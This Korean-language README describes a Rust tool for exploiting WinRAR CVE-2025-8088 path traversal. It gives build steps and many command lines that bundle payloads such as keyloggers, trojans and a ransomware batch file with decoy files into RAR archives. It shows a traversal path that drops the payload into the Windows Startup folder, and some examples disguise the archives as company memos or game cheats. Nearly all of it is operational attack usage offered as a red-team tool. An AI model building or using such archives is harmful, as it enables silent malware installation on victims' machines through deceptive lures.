
고성능, 메모리 안전한 WinRAR CVE-2025-8088 익스플로잇 도구의 구현으로, 더 나은 신뢰성과 성능을 위해 Rust로 재작성되었습니다.
고급 WinRAR 경로 탐색 공격 도구 - Rust 버전
WinRAR CVE-2025-8088 취약점을 Rust로 다시 구현한 고성능, 메모리 안전 공격 도구입니다.
# Rustup을 사용하여 Rust 설치
# 설치 확인
rustc --version
cargo --version
# vcpkg 사용
vcpkg install gtk:x64-windows
pacman -S mingw-w64-x86_64-gtk4
# Rust 프로젝트로 이동
cd winrar_exploit_rust
# 디버그 모드 빌드
cargo build
# 최적화된 릴리스 빌드
cargo build --release
# 애플리케이션 실행
cargo run --release
페이로드와 유인 파일로 간단한 공격 생성:
# 실행 가능 페이로드로 공격 생성
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "exploit.rar"
# 스크립트 페이로드로 공격 생성
.\winrar_exploit_rust.exe create --payload "C:\malicious.ps1" --decoy "C:\document.pdf" --output "malicious.rar"
# 쉼표로 구분된 여러 유인 파일 사용
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\photo.jpg,C:\document.pdf,C:\video.mp4" --output "multi_decoy.rar"
# 페이로드가 배치될 사용자 정의 디렉토리 지정
.\winrar_exploit_rust.exe create --payload "C:\payload.exe" --decoy "C:\decoy.txt" --output "custom_drop.rar" --drop_dir "C:\Users\Victim\Desktop"
# 이미지 페이로드 (스테가노그래피)
.\winrar_exploit_rust.exe create --payload "C:\malicious.jpg" --decoy "C:\innocent.txt" --output "image_exploit.rar"
# PDF 페이로드
.\winrar_exploit_rust.exe create --payload "C:\trojan.pdf" --decoy "C:\readme.txt" --output "pdf_exploit.rar"
# 배치 스크립트 페이로드
.\winrar_exploit_rust.exe create --payload "C:\ransomware.bat" --decoy "C:\instructions.txt" --output "batch_exploit.rar"
# 시스템 진단 실행하여 호환성 확인
.\winrar_exploit_rust.exe diagnose
# 사용 가능한 도구 및 기능 표시
.\winrar_exploit_rust.exe tools
# 회사 메모처럼 보이는 악성 문서 생성
.\winrar_exploit_rust.exe create --payload "C:\keylogger.exe" --decoy "C:\company_memo.pdf" --output "important_memo.rar"
# 게임 치트 파일에 악성 코드 숨기기
.\winrar_exploit_rust.exe create --payload "C:\trojan.exe" --decoy "C:\game_cheat.txt,C:\screenshot.jpg" --output "cheats.rar"
이 도구는 경로 탐색을 사용하여 RAR 아카이브를 생성합니다:
경로 예시: ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\payload.exe
winrar_exploit_rust/
├── src/
│ ├── main.rs # 애플리케이션 진입점
│ ├── gui.rs # GTK 기반 사용자 인터페이스
│ ├── exploit.rs # 핵심 공격 로직
│ ├── ads.rs # NTFS ADS 조작
│ ├── rar.rs # RAR5 헤더 조작
│ ├── diagnostics.rs # 시스템 진단
│ └── error.rs # 오류 처리
├── Cargo.toml # 의존성 및 빌드 설정
└── README.md # 이 파일
이 도구에는 자동 진단 기능이 포함되어 있습니다:
"GTK를 찾을 수 없음"
# GTK 개발 라이브러리 설치
# Windows (vcpkg)
vcpkg install gtk:x64-windows
# MSYS2 사용
pacman -S mingw-w64-x86_64-gtk4
"WinRAR CLI를 찾을 수 없음"
rar.exe가 Program Files에 있는지 확인"시작 디렉토리에 쓸 수 없음"
"NTFS ADS가 지원되지 않음"
컴파일 오류
# Rust 툴체인 업데이트
rustup update
# 정리 및 재빌드
cargo clean
cargo build --release
# 코드 포맷팅
cargo fmt
# 린트
cargo clippy
주요 의존성:
gtk - 현대적인 GUI 프레임워크tokio - 비동기 런타임windows - Windows API 바인딩crc32fast - 빠른 CRC32 계산byteorder - 바이트 순서 조작anyhow - 오류 처리이 프로젝트는 MIT 라이선스 하에 배포됩니다. 자세한 내용은 LICENSE 파일을 참조하십시오.
Telegram @kanonufo 제작
CVE-2025-8088 공격을 위한 고성능 레드팀 도구 - Rust 버전